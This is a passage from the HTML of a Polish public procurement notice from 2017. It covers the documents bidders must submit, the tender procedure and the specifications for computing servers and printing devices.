potwierdzającego, że wymaganie jest spełnione. Wydruk powinien jednoznacznie wskazywać źródło pochodzenia i datę wydruku.2. Dotyczy wszystkich asortymentów z części 1, 4 oraz asortymentu S1 z części 5: W przypadku gdy Wykonawca zaoferuje procesor, którego wynik wykonania testu wydajności PassMark-CPU Mark nie jest zawarty w bazie danych na stronie internetowej http://www.cpubenchmark.net, Zamawiający zgodnie z art. 26 ust. 2 ustawy Pzp wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, dokumentów potwierdzających spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, tj. przedłożenia wydruku potwierdzającego przeprowadzenie własnego testu wydajności PassMark-CPU Mark.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykonawca w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, wg wzoru określonego w Załączniku nr 5 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.2. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, chyba że Wykonawca wskaże dostępność tego dokumentu w formie elektronicznej pod określonym adresem internetowym ogólnodostępnej i bezpłatnej bazy danych i Zamawiający może pobrać go samodzielnie z tej bazy danych. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w zdaniu poprzednim, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w zdaniu poprzednim, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Przepis, dotyczący terminów wystawienia dokumentów, stosuje się odpowiednio.3. Oryginał pełnomocnictwa (lub notarialnie poświadczony odpis) osoby podpisującej (osób podpisujących) ofertę, jeśli umocowanie osoby podpisującej (osób podpisujących) ofertę nie wynika z dokumentów określonych w punkcie 2.4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował niezbędnymi zasobami tych podmiotów w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt oraz art. 24 ust. 5 pkt 1.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem zmian, których wystąpienie Zamawiający przewiduje, tj.:a) w przypadku zmiany danych podmiotowych Wykonawcy lub Zamawiającego (np. w wyniku przekształcenia, przejęcia, itp.),b) zmiany w zakresie wynagrodzenia z przyczyn niemożliwych wcześniej do przewidzenia lub jeżeli zmiany te są korzystne dla Zamawiającego, a w szczególności gdy Wykonawca zaproponuje upusty,c) w przypadku urzędowej zmiany stawki VAT nastąpi zmiana ceny proporcjonalnie do zmiany stawki VAT, tak w przypadku podwyżki jak i obniżki. Zmiana ceny wymaga udokumentowania przez Wykonawcę. Wartość umowy zmienia się odpowiednio.d) w sytuacji wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę,e) zmianę terminów realizacji przedmiotu zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, w przypadku okoliczności wystąpienia siły wyższej lub z powodu działania osób trzecich, które to przyczyny każda ze Stron musi udokumentować,f) zmianę postanowień zawartej umowy w przypadkach wymienionych w art. 144 ust. 1 pkt 2)-6) ustawy Pzp.2. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-05-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa O - serwery obliczeniowe </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: SERWER OBLICZENIOWY O1Wymagane elementy asortymentu 1 wraz z ilością oraz wymagane parametry:4 serwery do montażu w szafie przemysłowej o wysokości łącznej nie przekraczającej 4U. Możliwe rozwiązania typu "twin" i podobne. Każdy serwer powinien pozwalać na instalację minimum 256 GB pamięci RAM. Łącznie możliwość instalacji 16 dysków 3,5" SATA i przydziału po 4 dyski na serwer. Serwer typu A -1 sztuka:?	procesor o wyniku 15900 punktów lub więcej w teście CPUMark PassMark z kwietnia 2017 r., 8 rdzeni fizycznych, 64-bitowy, z 4-kanałową obsługą pamięci RAM (ECC), o przepustowości kontrolera pamięci 2x9.6 GT/s QPI lub wyższej,?	pamięć 128 GB w 4 modułach (4x32GB), DDR4.Serwer typu B - 3 sztuki:?	procesor o wyniku 14250 punktów lub więcej w teście CPUMark PassMark z kwietnia 2017 r., 6 rdzeni fizycznych, 64-bitowy, z 4-kanałową obsługą pamięci RAM (ECC), o przepustowości kontrolera pamięci min. 75 GB/s. Wydajność w teście PassMark CPUMark pojedynczego wątku (Single Thread Rating) - minimum 2100 punktów,?	pamięć 128 GB w 4 modułach (4x32GB), DDR4.Pamięć RAM DDR4 kompatybilna z serwerem typu A i z serwerem typu B - 4 moduły po 32GB (128 GB). = 1 komplet.Dysk SATA 1TB - 8 sztukDysk SATA 3TB - 1 sztukaKompilator Intel Fortran Compiler Academic Single Named User - 1 licencjaWymagana gwarancja: producenta, 36 miesięcy, on-site NBDSerwer obliczeniowy O1 ILOŚĆ: zgodnie z wyżej podanymi ilościami.Szczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.Zamawiający zastrzega sobie prawo do zwiększenia zapotrzebowania ilościowego (opcja), w ten sposób, że będzie miał prawo zakupu wybranego przedmiotu (lub wybranych przedmiotów) w ramach części zamówienia, przy czym łączna wartość zamówienia dodatkowego nie może przekroczyć 30% wartości tej części. W sytuacji, gdy Zamawiający będzie chciał skorzystać z prawa opcji zwróci się pisemnie do Wykonawcy z wnioskiem o dostarczenie wskazanego przedmiotu. Wykonawca będzie zobowiązany dostarczyć przedmiot zamówienia w terminie obowiązującym dla danej części zamówienia na warunkach określonych w umowie, SIWZ oraz złożonej ofercie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30211000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">jakość</td><td style="border: 1px solid black;border-collapse: collapse;">20</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">10</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Grupa asortymentowa D - urządzenia drukujące</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ASORTYMENT 1: URZĄDZENIE DRUKUJĄCE WIELOFUNKCYJNE D1	ILOŚĆ: 1 szt.Wymagane parametry:Funkcje: wymagane - druk, druk sieciowy, skaner, skaner sieciowy, kopiarkaFormat: A4 (A5, A6), gramatura papieru do 210 g/m2 Mono i kolor: wymaganeTechnologia druku: druk laserowy z rozdzielczością nie mniej niż 1200 x 1200 Druk dwustronny automatyczny: wymaganySzybkość drukowania/skanowania: zbliżona do 30 stron/minWydruk pierwszej strony: do 20 sCzas nagrzewania: do 40 sRozdzielczość kopiowania/skanowania rzeczywista: nie mniej niż 600 x 600 dpiSkanowanie/kopiowanie w kolorze: wymaganeAutomatyczny podajnik dokumentów: wymaganySkanowanie do plików w formatach: wymagane TIFF, PDF, JPEG, XPS Podajnik pojedynczych arkuszy: wymaganyKomunikacja: Ethernet, USBKoszt wydruku (przy użyciu materiałów oryginalnych (producenta urządzenia), z uwzględnieniem kosztu zużycia bębna światłoczułego, bez uwzględnienia kosztu papieru): max 25 gr/strona kolor, max 4 gr/strona mono.Wymagana gwarancja: producenta, 12 miesięcyASORTYMENT 2: URZĄDZENIE DRUKUJĄCE D2	ILOŚĆ: 1 szt.Wymagane parametryFunkcje: wymagane - druk, druk sieciowyFormat: A4, gramatura papieru do 220 g/m2Mono i kolor: wymaganeTechnologia druku: druk laserowy led, rozdzielczość nie mniej niż 1200 x 1200 Druk dwustronny automatyczny: wymaganySzybkość drukowania: zbliżona do 30 stron/minWydruk pierwszej strony: do 8 sCzas nagrzewania: do 30 sPodajnik pojedynczych arkuszy: wymaganyKomunikacja: Ethernet, USBKoszt wydruku (przy użyciu materiałów oryginalnych (producenta urządzenia), z uwzględnieniem kosztu zużycia bębna światłoczułego, bez uwzględnienia kosztu papieru): max 55 gr/strona kolor, max 8 gr/strona mono.Wymagana gwarancja: producenta, 36 miesięcyASORTYMENT 3: URZĄDZENIE DRUKUJĄCE WIELOFUNKCYJNE D3	ILOŚĆ: 1 szt.Wymagane parametryFunkcje: wymagane - druk, druk sieciowy, skaner, kopiarkaDruk: tylko MONOFormat: A4, gramatura papieru do 220 g/m2 Technologia druku: druk laserowy, rozdzielczość w trybie standardowym nie mniej niż 600 x 600Druk dwustronny automatyczny: wymaganySzybkość drukowania: zbliżona do 30 stron/minWydruk pierwszej strony: do 9 sPodajnik pojedynczych arkuszy: wymaganyKomunikacja: Ethernet, USB - wymagane, WiFi - pożądaneSkanowanie: wymagane w kolorze, skan do e-mail, formaty PDF, JPEG, TIFFAutomatyczny podajnik skanowania: wymaganyKoszt wydruku (przy użyciu materiałów oryginalnych (producenta urządzenia), z uwzględnieniem kosztu zużycia bębna światłoczułego, bez uwzględnienia kosztu papieru): mniej niż 9 gr/stronaWymagana gwarancja: producenta, 24 miesiące Szczegółowy opis przedmiotu zamówienia jest zawarty w SIWZ oraz Załączniku nr 1 do SIWZ.Zamawiający zastrzega sobie prawo do zwiększenia zapotrzebowania ilościowego (opcja), w ten sposób, że będzie miał prawo zakupu wybranego przedmiotu (lub wybranych przedmiotów) w ramach części zamówienia, przy czym łączna wartość zamówienia dodatkowego nie może przekroczyć 30% wartości tej części. W sytuacji, gdy Zamawiający będzie chciał skorzystać z prawa opcji zwróci się pisemnie do Wykonawcy z wnioskiem o dostarczenie wskazanego przedmiotu. Wykonawca będzie zobowiązany dostarczyć przedmiot zamówienia w terminie obowiązującym dla danej części zamówienia na warunkach określonych w umowie, SIWZ oraz złożonej ofercie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30232110-8, 30216110-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 6<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">jakość</td><td style="border: 1px solid black;border-collapse: collapse;">30</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td 